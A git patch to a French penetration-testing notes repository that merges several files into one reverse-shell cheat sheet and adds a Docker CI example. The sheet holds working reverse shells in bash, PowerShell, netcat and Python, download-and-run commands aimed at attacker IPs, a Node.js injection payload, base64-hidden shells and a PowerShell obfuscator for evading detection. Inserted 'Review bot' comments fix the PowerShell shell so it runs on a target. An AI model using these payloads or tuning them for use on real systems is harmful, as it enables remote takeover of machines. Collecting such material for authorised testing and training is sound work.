From da60efad3cacf462dfd1d6ef3f188dbf76cf251b Mon Sep 17 00:00:00 2001
From: "Taisen.fr (Dev)"
Date: Tue, 12 Nov 2024 10:43:50 +0100
Subject: [PATCH] Merge ReverseShell + Docker actions + NetExec

---
 Dojo-101-DevSec/Docker.md | 37 +++
 .../1-RECON-SCAN-ENUM/Windows-AD-et SMB.md | 8 +-
 .../Powershell-reverseshell.md | 16 --
 .../Python-Linux-reverse-Shell.md | 34 ---
 .../2-WEAPON-EXPLOIT/ReverseShell.md | 232 ++++++++++++++++++
 .../2-WEAPON-EXPLOIT/Web-Injection-NodeJS.md | 6 -
 .../2-WEAPON-EXPLOIT/bash-reverse-shell.md | 24 --
 Dojo-101-Pentest/2-WEAPON-EXPLOIT/netcat.md | 65 -----
 .../2-WEAPON-EXPLOIT/powershell-payload.md | 64 -----
 9 files changed, 276 insertions(+), 210 deletions(-)
 delete mode 100644 Dojo-101-Pentest/2-WEAPON-EXPLOIT/Powershell-reverseshell.md
 delete mode 100644 Dojo-101-Pentest/2-WEAPON-EXPLOIT/Python-Linux-reverse-Shell.md
 create mode 100644 Dojo-101-Pentest/2-WEAPON-EXPLOIT/ReverseShell.md
 delete mode 100644 Dojo-101-Pentest/2-WEAPON-EXPLOIT/bash-reverse-shell.md
 delete mode 100644 Dojo-101-Pentest/2-WEAPON-EXPLOIT/netcat.md
 delete mode 100644 Dojo-101-Pentest/2-WEAPON-EXPLOIT/powershell-payload.md

diff --git a/Dojo-101-DevSec/Docker.md b/Dojo-101-DevSec/Docker.md
index 36b5932..d15ef2a 100644
--- a/Dojo-101-DevSec/Docker.md
+++ b/Dojo-101-DevSec/Docker.md
@@ -188,6 +188,43 @@ docker build . l'image est ensuite ajouté (`docker image ls`) +Exemple de build via github acitons : + +```yml +name: Docker + +on: + push: + branches: + - main + pull_request: + branches: + - main + +jobs: + build: + runs-on: ubuntu-latest + + steps: + - name: Checkout code + uses: actions/checkout@v2 + + - name: Set up Docker Buildx + uses: docker/setup-buildx-action@v1 + + - name: Build Docker image + run: docker build -t vulnerablelightapp . + + - name: Run Docker container + run: docker run -d -p 3000:3000 vulnerablelightapp + + - name: Wait for the container to be ready + run: sleep 30 + + - name: Test the application + run: curl -k https://127.0.0.1:3000 +``` + ## Docker Compose diff --git a/Dojo-101-Pentest/1-RECON-SCAN-ENUM/Windows-AD-et SMB.md b/Dojo-101-Pentest/1-RECON-SCAN-ENUM/Windows-AD-et SMB.md index 8e926b1..724af3a 100644 --- a/Dojo-101-Pentest/1-RECON-SCAN-ENUM/Windows-AD-et SMB.md +++ b/Dojo-101-Pentest/1-RECON-SCAN-ENUM/Windows-AD-et SMB.md @@ -1,8 +1,14 @@ # Windows AD et SMB (reseau) + +## Netexec + +[NetExec](https://github.com/Pennyw0rth/NetExec) + + ## Responder -[Projet](https://github.com/lgandx/Responder) +[Responder](https://github.com/lgandx/Responder) ### llmnr et netbios spoofing, netLM interception diff --git a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/Powershell-reverseshell.md b/Dojo-101-Pentest/2-WEAPON-EXPLOIT/Powershell-reverseshell.md deleted file mode 100644 index b1d7dd5..0000000 --- a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/Powershell-reverseshell.md +++ /dev/null 
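Review bot: The `Test the application` step in the new workflow cannot fail on an application error: `curl -k https://127.0.0.1:3000` exits 0 for any HTTP status, and `-k` switches off certificate verification, so the job only proves that something accepted a TCP connection on port 3000. Replace the fixed `sleep 30` plus bare curl with `run: curl --fail --silent --show-error --retry 10 --retry-connrefused --retry-delay 3 -k https://127.0.0.1:3000` and add the comment `# -k: the container presumably serves a self-signed cert in CI; never reuse this against a real endpoint` so the trade-off is explicit rather than silently copied. The actions are referenced by floating major tags (`actions/checkout@v2`, `docker/setup-buildx-action@v1`); on a DevSec page they should be pinned to a full commit SHA with the version in a trailing comment, e.g. `uses: actions/checkout@<full-sha> # v4`, because a moved tag runs unreviewed code with the repository token. The prose line introducing the block also misspells `github acitons`.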
@@ -1,16 +0,0 @@ -# powershell reverseshell - -## classique - -```pwsh -$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() -``` - - -## sans prompt: - -```powershell -$client=New-Object System.Net.Sockets.TCPClient("127.0.0.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String )$sendback2 = $sendback ;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() -``` - - diff --git a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/Python-Linux-reverse-Shell.md b/Dojo-101-Pentest/2-WEAPON-EXPLOIT/Python-Linux-reverse-Shell.md deleted file mode 100644 index 82ea002..0000000 --- a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/Python-Linux-reverse-Shell.md +++ /dev/null 
@@ -1,34 +0,0 @@ -# Linux_reverseShell -## msfvenom -msfvenom -p cmd/unix/reverse_python LHOST=10.10.13.149 LPORT=10443 -f raw - -[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload -[-] No arch selected, selecting arch: cmd from the payload -No encoder or badchars specified, outputting raw payload -Payload size: 525 bytes -python -c "exec('aW1wb3J0IHNvY2tldCAgICAgLCAgICBzdWJwcm9jZXNzICAgICAsICAgIG9zICAgICA7ICAgIGhvc3Q9IjEwLjEwLjEzLjE0OSIgICAgIDsgICAgcG9ydD0xMDQ0MyAgICAgOyAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgICwgICAgc29ja2V0LlNPQ0tfU1RSRUFNKSAgICAgOyAgICBzLmNvbm5lY3QoKGhvc3QgICAgICwgICAgcG9ydCkpICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAwKSAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICwgICAgMSkgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpICAgICAsICAgIDIpICAgICA7ICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))" - - -## a la main: -python -c 'import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect( ("192.168.1.20",1234)); os.dup2 (s.fileno() ,0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call( ["/bin/sh","-i"] );' - - -## URL ENCODE: - ->>> import urllib.parse ->>> urllib.parse.quote(shell) -'import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.10.13.149%22%2C10443%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3Bos.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22/bin/sh%22%2C%22-i%22%5D%29%29%3B' - - - -## injection avec eval(..): - -'__import__("os").system("nc 10.10.13.149 10443 -e /bin/sh").read()' - -'__import__(\"os\").system(\"nc 10.10.13.149 10443 -e /bin/sh").read() - -## shell simple -#!/usr/bin/env python -import os -os.system('/bin/bash') - diff --git a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/ReverseShell.md b/Dojo-101-Pentest/2-WEAPON-EXPLOIT/ReverseShell.md new file mode 100644 index 0000000..f4ef3ad --- /dev/null 
+++ b/Dojo-101-Pentest/2-WEAPON-EXPLOIT/ReverseShell.md 
@@ -0,0 +1,232 @@ +# Reverseshell + +### Ressources + +[ReverseShell générator](https://www.revshells.com/) + +## Bash + +### Certaines versions de Bash permettent de transmettre un reverse-shell via « /dev/tcp/ » ou « /dev/udp/ » (version compilée avec le drapeau « –enable-net-redirections »). + +```sh +bash -i >& /dev/tcp// 0>&1 + +exec 5<>/dev/tcp//;cat <&5 | while read line; do $line 2>&5 >&5; done + +exec /bin/sh 0/ 1>&0 2>&0 + +0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196 + +echo "/bin/bash -c 'bash -i >& /dev/tcp// 0>&1'" > file + +echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.13.131/443 0>&1'" > /usr/local/bin/run-parts + +'echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMy4yNS80NDMgMD4mMQ==|base64${IFS}-d|bash;' +``` + + +## powershell + +### classique + +```pwsh +$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". 
{ $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() +``` + + +### sans prompt: + +```powershell +$client=New-Object System.Net.Sockets.TCPClient("127.0.0.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String )$sendback2 = $sendback ;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() +``` + +### reverseshell + +```powershell +$rs = ' +$c=nEw-OBJeCt SYsTEm.nET.SOcKetS.tcpcLIENT((wRiTe-oUtpuT 127.0.0.1),10443);$s=$c.gETsTrEaM();[BYtE[]]$b=0..65535|%{0};wHILe(($i=$s.rEAd($b,0,$b.LENgTh))-NE0){$a=(NEw-oBJeCT -tYPenAME sYSteM.tEXT.aScIieNcOdInG).gETsTRIng($b,0,$i);$k=(iEX $a 2>&1|oUt-stRInG);$z=$k+(WrITe-OuTPut `>);$d=([teXT.eNcODiNg]::aSCii).gETByTEs($z);$s.wRiTE($d,0,$d.LEnGtH);$s.fLuSH()};$c.cLoSE() +' +``` + +### Download + +```powershell +powershell -c "iex(New-Object Net.WebClient).DownloadString('http://10.9.2.43:8000/script.ps1')" + +powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.9.1.214:8000/myshell.exe','myshell.exe')" +``` + +### Executer directement + +```powershell +(iwr ).content |Iex +``` + + + +## netcat + +### reverseshell + +Notes : selon les versions `-c` remplace `-e` + +```sh +nc 10.0.0.1 1234 -e /bin/sh +nc 10.0.0.1 1234 -e cmd.exe +nc -e /bin/sh 10.0.0.1 1234 +``` + +### listener + +```sh +nc -nvlp 443 +``` + +### file transfert + +alice: + +```sh +nc -lnvp 10443 < lse.sh +``` + +bob: + +```sh +nc IP 10443 > lse.sh +``` + +### bind shell + +```sh +nc -l -p -e /bin/bash +``` + +### sans options + +victime + +```sh +mknod /tmp/backpipe p +/bin/sh 0/tmp/backpipe +``` + +### nc traditional: 
+ +```sh +/usr/bin/nc.traditional +``` + +### Windows + +```powershell +powershell -c “iwr http://10.10.14.4:8000/nc64.exe -outfile c:\temp/nc64.exe” +c:\temp\nc64.exe 10.10.14.4 10443 -e powershell +``` + +### mkfifo + +```sh +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f +``` + + +## Powrshell obfusquer le payload + +```powershell +[byte[]] $scriptBytes = [system.Text.Encoding]::UTF8.GetBytes($rs) + +#byte rotation +$rot = Get-Random -Maximum 254 -Minimum 5 +$derot = 255 - $rot +$rotbytes = [system.Text.Encoding]::UTF8.GetBytes('') +$scriptBytes | %{ $rotbytes += ($_ + $rot)%255} + + +#payload in byte without rotation here: +#$output = "" +#$scriptBytes |% {$output += $_.tostring()+ ","} +#$output = $output -replace ".$" +#$output = "[sYsTeM.TeXT.eNcOdInG]::asCii.gEtsTRiNG(`$([bYtE]" + $output + "))|IEx" +#write-host $output + +#payload in byte WITH rotation: +$output = "" +$rotBytes |% {$output += $_.tostring()+ ","} +$output = $output -replace ".$" + +$rand1 = Get-Random -Maximum 254 -Minimum 5 ; $rand2 = Get-Random -Maximum 254 -Minimum 5 ; $rand3 = Get-Random -Maximum 254 -Minimum 5 + +#$output = "`$([bYtE]" + $output + ")" #objet de type byte +#$output = "`$d;`$([bYtE]" + $output + ")|%{ `$d+=(`$_ + $rot)%255};`$d" #payload déchiffré +#$output = "`$255=[system.Text.Encoding]::UTF8.GetBytes('');[sYsTeM.TeXT.eNcOdInG]::asCii.gEtsTRiNG(`$(`$([bYtE]" + $output + ")|%{`$255+=(`$_+$derot)%255};`$255))|iEx" +#$output = "`$0=255;`$133=[sYsTeM.TeXT.eNcOdInG];`$255=`$133::utF8.gEtbYtES('');`$133::asCii.gEtsTRiNG(`$(`$([bYtE]" + $output + ")|%{`$255+=(`$_+(255+$derot-255))%`$0};`$255))|iEx" +#$output = "`$0=255;`$133=[sYsTeM.TeXT.eNcOdInG];[BytE[]]`$255='';`$133::asCii.gEtsTRiNG(`$(`$([bYtE]" + $output + ")|%{`$255+=(`$_+(255+$derot-255))%`$0};`$255))|iEx" #erreur non bloquante à ;[BytE[]]`$255='' +$output = "`$$rand2=255;`$$rand1=[sYsTeM.TeXT.eNcOdInG];[BytE[]]`$$rand3='';`$$rand1::asCii.gEtsTRiNG(`$(([bYtE]" + $output + 
")|%{`$$rand3+=(`$_+(`$$rand2+$derot))%`$$rand2};`$$rand3))|iEx" + +write-host $output +``` + +## msfvenom + +```sh +msfvenom -p cmd/unix/reverse_python LHOST=10.10.13.149 LPORT=10443 -f raw + +[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload +[-] No arch selected, selecting arch: cmd from the payload +No encoder or badchars specified, outputting raw payload +Payload size: 525 bytes +python -c "exec('aW1wb3J0IHNvY2tldCAgICAgLCAgICBzdWJwcm9jZXNzICAgICAsICAgIG9zICAgICA7ICAgIGhvc3Q9IjEwLjEwLjEzLjE0OSIgICAgIDsgICAgcG9ydD0xMDQ0MyAgICAgOyAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgICwgICAgc29ja2V0LlNPQ0tfU1RSRUFNKSAgICAgOyAgICBzLmNvbm5lY3QoKGhvc3QgICAgICwgICAgcG9ydCkpICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAwKSAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICwgICAgMSkgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpICAgICAsICAgIDIpICAgICA7ICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))" +``` + +## python + +```python +python -c 'import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect( ("192.168.1.20",1234)); os.dup2 (s.fileno() ,0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call( ["/bin/sh","-i"] );' +``` + +```python +import os,socket,subprocess,threading; +def s2p(s, p): + while True: + data = s.recv(1024) + if len(data) > 0: + p.stdin.write(data) + +def p2s(s, p): + while True: + s.send(p.stdout.read(1)) + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +s.connect(("192.168.1.20",4444)) + +p=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE) + +s2p_thread = threading.Thread(target=s2p, args=[s, p]) +s2p_thread.daemon = True +s2p_thread.start() + +p2s_thread = threading.Thread(target=p2s, args=[s, p]) +p2s_thread.daemon = True +p2s_thread.start() + +try: + p.wait() +except KeyboardInterrupt: + s.close() +``` + + + +### exemple d'injection python avec eval(..): + +```python 
+__import__("os").system("nc 10.10.13.149 10443 -e /bin/sh").read() +__import__(\"os\").system(\"nc 10.10.13.149 10443 -e /bin/sh").read() +``` + +## NodeJS + +```bash +curl http://127.0.0.1:21440/admin -X POST -d '{"key":"\"); const { exec } = require(\"child_process\"); exec(\"nc -e /bin/bash 127.0.0.1 1234\"); //"}' +``` \ No newline at end of file diff --git a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/Web-Injection-NodeJS.md b/Dojo-101-Pentest/2-WEAPON-EXPLOIT/Web-Injection-NodeJS.md index 84e8373..1d9d250 100644 --- a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/Web-Injection-NodeJS.md +++ b/Dojo-101-Pentest/2-WEAPON-EXPLOIT/Web-Injection-NodeJS.md @@ -49,10 +49,4 @@ curl -X POST http://167.99.88.216:32153/admin -d '{"key":"\"); const { exec } = ```bash curl http://127.0.0.1:21440/admin -X POST -d '{"key":"\"); const { exec } = require(\"child_process\"); exec(\"ping -c 3 127.0.0.1\"); //"}' sudo tcpdump -i lo icmp -``` - -### ReverseShell - -```bash -curl http://127.0.0.1:21440/admin -X POST -d '{"key":"\"); const { exec } = require(\"child_process\"); exec(\"nc -e /bin/bash 127.0.0.1 1234\"); //"}' ``` \ No newline at end of file diff --git a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/bash-reverse-shell.md b/Dojo-101-Pentest/2-WEAPON-EXPLOIT/bash-reverse-shell.md deleted file mode 100644 index 339420c..0000000 --- a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/bash-reverse-shell.md +++ /dev/null 
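Review bot: The `sans prompt` PowerShell one-liner in the new ReverseShell.md is not valid PowerShell as written: `(iex $data 2>&1 | Out-String )$sendback2 = $sendback` lacks the statement separator, so pasting it on a target yields a parse error instead of a shell; it should read `$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback;`. The merge also dropped the explanation that the deleted bash-reverse-shell.md carried for the last Bash entry — restore a comment such as `# base64 of: bash -i >& /dev/tcp/10.10.13.25/443 0>&1` above the `'echo${IFS}YmFz…'` line, otherwise the reader has to decode it to learn what it executes. Several commands appear with their placeholders missing (`bash -i >& /dev/tcp// 0>&1`, `exec /bin/sh 0/ 1>&0 2>&0`, `nc -l -p -e /bin/bash`, `/bin/sh 0/tmp/backpipe`, `(iwr ).content |Iex`); this looks like `<IP>`/`<PORT>`/`<URL>` tokens being swallowed as HTML tags somewhere between the source and the rendered page, so they should be written as plain `IP`/`PORT`/`URL` or escaped so they survive rendering. Finally, the long sentence about `--enable-net-redirections` is used as an `###` heading directly under `## Bash`; it reads better as a normal paragraph followed by a short `### /dev/tcp` heading.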
@@ -1,24 +0,0 @@ -# bash reverseshell - -### Certaines versions de Bash permettent de transmettre un reverse-shell via « /dev/tcp/ » ou « /dev/udp/ » (version compilée avec le drapeau « –enable-net-redirections »). - -```sh -bash -i >& /dev/tcp// 0>&1 - -exec 5<>/dev/tcp//;cat <&5 | while read line; do $line 2>&5 >&5; done - -exec /bin/sh 0/ 1>&0 2>&0 - -0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196 -``` - -## le meilleur: - -```sh -echo "/bin/bash -c 'bash -i >& /dev/tcp// 0>&1'" > file - -echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.13.131/443 0>&1'" > /usr/local/bin/run-parts - -### obfuscation base 64: (bash -i >& /dev/tcp/10.10.13.25/443 0>&1) -'echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMy4yNS80NDMgMD4mMQ==|base64${IFS}-d|bash;' -``` diff --git a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/netcat.md b/Dojo-101-Pentest/2-WEAPON-EXPLOIT/netcat.md deleted file mode 100644 index 21be3c5..0000000 --- a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/netcat.md +++ /dev/null @@ -1,65 +0,0 @@ -# netcat - -## reverseshell - -Notes : selon les versions `-c` remplace `-e` - -```sh -nc 10.0.0.1 1234 -e /bin/sh -nc 10.0.0.1 1234 -e cmd.exe -nc -e /bin/sh 10.0.0.1 1234 -``` - -## listener - -```sh -nc -nvlp 443 -``` - -## file transfert - -alice: - -```sh -nc -lnvp 10443 < lse.sh -``` - -bob: - -```sh -nc IP 10443 > lse.sh -``` - -## bind shell - -```sh -nc -l -p -e /bin/bash -``` - -## sans options - -victime - -```sh -mknod /tmp/backpipe p -/bin/sh 0/tmp/backpipe -``` - -## nc traditional: - -```sh -/usr/bin/nc.traditional -``` - -## Windows - -```powershell -powershell -c “iwr http://10.10.14.4:8000/nc64.exe -outfile c:\temp/nc64.exe” -c:\temp\nc64.exe 10.10.14.4 10443 -e powershell -``` - -## mkfifo - -```sh -rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f -``` diff --git a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/powershell-payload.md b/Dojo-101-Pentest/2-WEAPON-EXPLOIT/powershell-payload.md deleted file mode 100644 index 3e8bfb5..0000000 
--- a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/powershell-payload.md +++ /dev/null 
@@ -1,64 +0,0 @@ -# Powrshell obfusquer le payload - - -## Download - -```powershell -powershell -c "iex(New-Object Net.WebClient).DownloadString('http://10.9.2.43:8000/script.ps1')" - -powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.9.1.214:8000/myshell.exe','myshell.exe')" -``` - -## Executer directement - -```powershell -(iwr ).content |Iex -``` - - -## reverseshell - -```powershell -$rs = ' -$c=nEw-OBJeCt SYsTEm.nET.SOcKetS.tcpcLIENT((wRiTe-oUtpuT 127.0.0.1),10443);$s=$c.gETsTrEaM();[BYtE[]]$b=0..65535|%{0};wHILe(($i=$s.rEAd($b,0,$b.LENgTh))-NE0){$a=(NEw-oBJeCT -tYPenAME sYSteM.tEXT.aScIieNcOdInG).gETsTRIng($b,0,$i);$k=(iEX $a 2>&1|oUt-stRInG);$z=$k+(WrITe-OuTPut `>);$d=([teXT.eNcODiNg]::aSCii).gETByTEs($z);$s.wRiTE($d,0,$d.LEnGtH);$s.fLuSH()};$c.cLoSE() -' -``` - - -## to bytes - - -```powershell -[byte[]] $scriptBytes = [system.Text.Encoding]::UTF8.GetBytes($rs) - -#byte rotation -$rot = Get-Random -Maximum 254 -Minimum 5 -$derot = 255 - $rot -$rotbytes = [system.Text.Encoding]::UTF8.GetBytes('') -$scriptBytes | %{ $rotbytes += ($_ + $rot)%255} - - -#payload in byte without rotation here: -#$output = "" -#$scriptBytes |% {$output += $_.tostring()+ ","} -#$output = $output -replace ".$" -#$output = "[sYsTeM.TeXT.eNcOdInG]::asCii.gEtsTRiNG(`$([bYtE]" + $output + "))|IEx" -#write-host $output - -#payload in byte WITH rotation: -$output = "" -$rotBytes |% {$output += $_.tostring()+ ","} -$output = $output -replace ".$" - -$rand1 = Get-Random -Maximum 254 -Minimum 5 ; $rand2 = Get-Random -Maximum 254 -Minimum 5 ; $rand3 = Get-Random -Maximum 254 -Minimum 5 - -#$output = "`$([bYtE]" + $output + ")" #objet de type byte -#$output = "`$d;`$([bYtE]" + $output + ")|%{ `$d+=(`$_ + $rot)%255};`$d" #payload déchiffré -#$output = "`$255=[system.Text.Encoding]::UTF8.GetBytes('');[sYsTeM.TeXT.eNcOdInG]::asCii.gEtsTRiNG(`$(`$([bYtE]" + $output + ")|%{`$255+=(`$_+$derot)%255};`$255))|iEx" -#$output = 
"`$0=255;`$133=[sYsTeM.TeXT.eNcOdInG];`$255=`$133::utF8.gEtbYtES('');`$133::asCii.gEtsTRiNG(`$(`$([bYtE]" + $output + ")|%{`$255+=(`$_+(255+$derot-255))%`$0};`$255))|iEx" -#$output = "`$0=255;`$133=[sYsTeM.TeXT.eNcOdInG];[BytE[]]`$255='';`$133::asCii.gEtsTRiNG(`$(`$([bYtE]" + $output + ")|%{`$255+=(`$_+(255+$derot-255))%`$0};`$255))|iEx" #erreur non bloquante à ;[BytE[]]`$255='' -$output = "`$$rand2=255;`$$rand1=[sYsTeM.TeXT.eNcOdInG];[BytE[]]`$$rand3='';`$$rand1::asCii.gEtsTRiNG(`$(([bYtE]" + $output + ")|%{`$$rand3+=(`$_+(`$$rand2+$derot))%`$$rand2};`$$rand3))|iEx" - -write-host $output -``` -